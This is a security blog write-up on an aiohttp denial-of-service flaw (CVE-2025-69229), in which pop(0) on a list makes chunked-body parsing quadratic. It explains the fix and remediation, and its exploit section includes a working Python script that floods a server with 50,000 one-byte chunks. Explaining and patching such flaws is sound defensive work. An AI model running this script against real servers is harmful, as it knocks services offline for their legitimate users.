Death by a Thousand Chunks: The aiohttp O(N^2) DoS
Jan 6, 2026 · 6 min read
Executive Summary (TL;DR)
aiohttp used a standard Python list to track HTTP chunk offsets, using `pop(0)` to retrieve them. Since `pop(0)` is an O(N) operation, processing a request with N chunks resulted in O(N^2) complexity. An attacker sending a stream of 1-byte chunks can monopolize the CPU, blocking the event loop and denying service to all other clients.
A high-impact Denial of Service vulnerability in the aiohttp Python library caused by algorithmic complexity in handling HTTP chunked transfer encoding. By flooding the server with thousands of tiny chunks, an attacker can trigger quadratic CPU consumption, effectively freezing the asynchronous event loop.
The Hook: Async Dreams vs. Synchronous Nightmares
We love aiohttp. It’s the backbone of modern Python microservices, promising high concurrency through the magic of the asyncio event loop. The deal we make with asyncio is simple: you can handle thousands of connections, as long as you never block the loop.
But here’s the thing about that deal: it relies on trust. It trusts that your code (and your library's code) won't spend an eternity shifting bits around in memory while other connections are waiting for their turn. CVE-2025-69229 is a betrayal of that trust.
It turns out that handling HTTP chunked transfer encoding—a standard feature for streaming data—was implemented with a naive data structure that turns a simple file upload into a computational black hole. If you run aiohttp in production, a single malicious client with a slow internet connection (or a script pretending to have one) can bring your shiny async worker to a complete halt.
The Flaw: A List of Problems
The root cause here is a classic Computer Science 101 failure: choosing the wrong data structure for the job. Specifically, aiohttp was using a standard Python list to store the offsets of incoming chunk boundaries in self._http_chunk_splits.
When you upload data using Transfer-Encoding: chunked, the server parses the stream and marks where each chunk ends. The parser then consumes these offsets one by one to reconstruct the body. In the vulnerable code, this consumption happened via pop(0).
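To make the mechanics concrete, here is a toy chunked-body parser that records and then consumes boundary offsets the same way the vulnerable code did. It is an illustrative simplification, not aiohttp's actual parser:

```python
def parse_chunked(stream: bytes):
    """Toy chunked-body parser: returns (body, chunk boundary offsets)."""
    body = b""
    splits = []  # the vulnerable code kept offsets in a plain list
    pos = 0
    while True:
        # Each chunk starts with a hex size followed by CRLF
        eol = stream.index(b"\r\n", pos)
        size = int(stream[pos:eol], 16)
        pos = eol + 2
        if size == 0:  # a zero-length chunk terminates the body
            break
        body += stream[pos:pos + size]
        splits.append(len(body))  # one offset recorded per chunk
        pos += size + 2  # skip the chunk data and its trailing CRLF
    return body, splits

body, splits = parse_chunked(b"1\r\nA\r\n1\r\nB\r\n0\r\n\r\n")
print(body, splits)  # b'AB' [1, 2]

# Consumption, front-first, as in the vulnerable read loop:
while splits:
    splits.pop(0)
```

Every tiny chunk the attacker sends adds one entry to that list; the damage is done when the entries are consumed from the front.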
Here lies the dragon. In Python, a list is implemented as a dynamic array. When you call pop(0), you remove the first element. To maintain the array's integrity, Python must shift every single remaining element one slot to the left. This is an O(N) operation.
Now, imagine an attacker sends a payload split into 50,000 chunks (N=50,000). For the first chunk, the server shifts 49,999 items. For the second, 49,998 items. By the end, you've performed roughly (N^2)/2 operations. That's 1.25 billion memory shifts for a trivial amount of data. Your CPU isn't serving requests anymore; it's just shuffling pointers.
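The gap is easy to demonstrate. The drain functions below are illustrative stand-ins, not aiohttp code; they simply drain N offsets through `pop(0)` versus `popleft()`:

```python
from collections import deque
import timeit

def shifts_for(n: int) -> int:
    """Total element shifts to drain an n-item list via pop(0):
    (n-1) + (n-2) + ... + 0 = n*(n-1)/2."""
    return n * (n - 1) // 2

def drain_list(n: int) -> None:
    splits = list(range(n))
    while splits:
        splits.pop(0)       # O(len(splits)) each call

def drain_deque(n: int) -> None:
    splits = deque(range(n))
    while splits:
        splits.popleft()    # O(1) each call

print(f"{shifts_for(50_000):,} shifts for 50,000 chunks")  # 1,249,975,000
N = 20_000
print(f"list : {timeit.timeit(lambda: drain_list(N), number=1):.3f}s")
print(f"deque: {timeit.timeit(lambda: drain_deque(N), number=1):.3f}s")
```

Even at a modest N of 20,000, the list variant is an order of magnitude slower, and the gap widens quadratically from there.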
The Code: The Smoking Gun
Let's look at the diff. It is painfully simple, yet it saves the day. The fix involves two main parts: swapping the data structure and implementing backpressure.
Part 1: The Algo Fix
The maintainers swapped the list for a collections.deque (double-ended queue). A deque is implemented as a doubly-linked list of blocks. popleft() on a deque is an O(1) operation. It doesn't care how many items are in the queue.
```python
# VULNERABLE CODE (aiohttp/streams.py)
self._http_chunk_splits = []  # Just a list
...
# Inside the read loop
pos = self._http_chunk_splits.pop(0)  # O(N) - The killer line
```

```python
# FIXED CODE
from collections import deque

self._http_chunk_splits = deque()
...
pos = self._http_chunk_splits.popleft()  # O(1) - sanity restored
```

Part 2: The Flow Control
Even with O(1) popping, storing millions of chunk offsets is a memory hazard. The patch adds "watermarks" to pause reading from the socket if the metadata buffer gets too full. This is crucial: before this, aiohttp only throttled based on byte size, not chunk count.
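Conceptually, the watermark scheme pairs every pause with a matching resume once the queue drains. Here is a minimal toy model of that state machine; the class, method names, and thresholds are my own illustrative assumptions, not aiohttp's internals:

```python
class ChunkBackpressure:
    """Toy pause/resume watermarks keyed on chunk-metadata count."""

    def __init__(self, high: int = 2048, low: int = 512):
        self.high = high    # pause reading above this many queued offsets
        self.low = low      # resume once drained below this
        self.paused = False

    def on_chunk_boundary(self, queue_len: int) -> bool:
        """Called when the parser records a new offset."""
        if queue_len > self.high and not self.paused:
            self.paused = True   # real code would call protocol.pause_reading()
        return self.paused

    def on_consume(self, queue_len: int) -> bool:
        """Called when the application consumes an offset."""
        if queue_len < self.low and self.paused:
            self.paused = False  # real code would call protocol.resume_reading()
        return self.paused

bp = ChunkBackpressure()
print(bp.on_chunk_boundary(3000))  # True: too many queued offsets, pause
print(bp.on_consume(100))          # False: drained below low water, resume
```

The hysteresis between the high and low marks avoids flapping: the socket stays paused until the application has made real progress draining the queue.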
```python
# Added in the fix
if len(self._http_chunk_splits) > self._high_water_chunks:
    if not self._protocol._reading_paused:
        self._protocol.pause_reading()
```

The Exploit: Death by 1000 Bytes
Exploiting this is trivial. We don't need to bypass ASLR or craft ROP chains. We just need to be annoying. We will open a socket, declare that we are sending chunked data, and then send thousands of chunks containing a single byte each (or even zero data, just metadata overhead).
Here is a conceptual Python PoC that breaks a vulnerable server:
```python
import socket

target_host = "127.0.0.1"
target_port = 8080

# Connect to the vulnerable aiohttp server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_host, target_port))

# Start a POST request with chunked encoding
s.sendall(b"POST / HTTP/1.1\r\n")
s.sendall(b"Host: target\r\n")
s.sendall(b"Transfer-Encoding: chunked\r\n\r\n")

# Send 50,000 tiny chunks
# Each '1\r\nA\r\n' adds an entry to the vulnerable list
for i in range(50000):
    s.sendall(b"1\r\nA\r\n")
    # No sleep needed; we want to flood the list

# Terminate the stream
s.sendall(b"0\r\n\r\n")

# At this point, when the server tries to read this body,
# it enters the O(N^2) loop and hangs.
print("Payload sent. Server should be struggling now.")
```

When the server application calls await request.read(), it walks into the trap. The event loop blocks. If you have a health check endpoint on the same worker, it will time out.
The Impact: Why Should We Panic?
In a synchronous world (like classic Flask or Django with gunicorn workers), this would lock up one worker process. Annoying, but survivable if you have 20 workers.
In the asynchronous world of aiohttp, a single process often handles hundreds or thousands of concurrent connections. When the event loop blocks to process our malicious chunk list, it stops processing everything.
Heartbeats fail. Database callbacks aren't fired. Other legitimate users trying to load the homepage are left spinning. A single attacker can effectively DoS an entire instance with very little bandwidth. It is an asymmetric attack: low cost for the attacker, high cost for the defender.
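One practical way to observe this failure mode is to measure event-loop lag: schedule a short timer and check how late it fires. The snippet below is a generic diagnostic sketch, not aiohttp-specific; the synchronous `time.sleep` stands in for the quadratic chunk processing:

```python
import asyncio
import time

async def measure_loop_lag(interval: float) -> float:
    """Sleep for `interval` and report how much extra time elapsed
    because the event loop was busy elsewhere."""
    start = time.monotonic()
    await asyncio.sleep(interval)
    return time.monotonic() - start - interval

async def main() -> float:
    probe = asyncio.ensure_future(measure_loop_lag(0.05))
    await asyncio.sleep(0)  # yield so the probe reaches its await
    time.sleep(0.3)         # synchronous work: the loop is frozen
    return await probe

lag = asyncio.run(main())
print(f"loop lag: {lag:.2f}s")  # roughly the 0.3s we spent blocking
```

A lag monitor like this, exported as a metric, turns "the service feels slow" into a concrete signal that something is hogging the loop.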
The Fix: Remediation
The fix is straightforward: upgrade aiohttp. The maintainers released version 3.13.3, which includes both the deque optimization and the chunk-count throttling.
Remediation Steps:
- Update your requirements file: aiohttp>=3.13.3.
- Rebuild your container images.
- Deploy.
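To verify what a deployment is actually running, a quick runtime check can compare the installed version against the fixed release. The `parse` helper here is a naive illustration; a real deployment should use `packaging.version` for correct pre-release handling:

```python
from importlib.metadata import PackageNotFoundError, version

def parse(v: str) -> tuple:
    """Naive version parse: keeps only leading numeric components."""
    return tuple(int(p) for p in v.split(".")[:3] if p.isdigit())

try:
    installed = version("aiohttp")
    if parse(installed) < (3, 13, 3):
        print(f"VULNERABLE: aiohttp {installed}, upgrade to >=3.13.3")
    else:
        print(f"OK: aiohttp {installed}")
except PackageNotFoundError:
    print("aiohttp is not installed")
```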
Defense in Depth:
If you cannot upgrade immediately, consider placing a reverse proxy like Nginx in front of your Python application. Nginx is generally much more robust against chunked encoding abuse. You can configure Nginx to buffer the entire request body before passing it to the upstream aiohttp server (proxy_request_buffering on;, which is usually the default). This collapses the chunks into a standard Content-Length request (or larger chunks), neutralizing the attack before it hits Python.
Technical Appendix
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U

Affected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
| aio-libs aiohttp | <= 3.13.2 | 3.13.3 |

| Attribute | Detail |
|---|---|
| CWE | CWE-770 (Allocation of Resources Without Limits or Throttling) |
| Attack Vector | Network |
| CVSS v4.0 | 6.6 (Medium) |
| Complexity | O(N^2) Quadratic |
| Impact | Denial of Service (Event Loop Block) |
| Status | Fixed in 3.13.3 |
CWE-770: Allocation of Resources Without Limits or Throttling

The software allocates resources (memory, CPU) without limits or throttling based on the quantity of input metadata, allowing an attacker to cause resource exhaustion.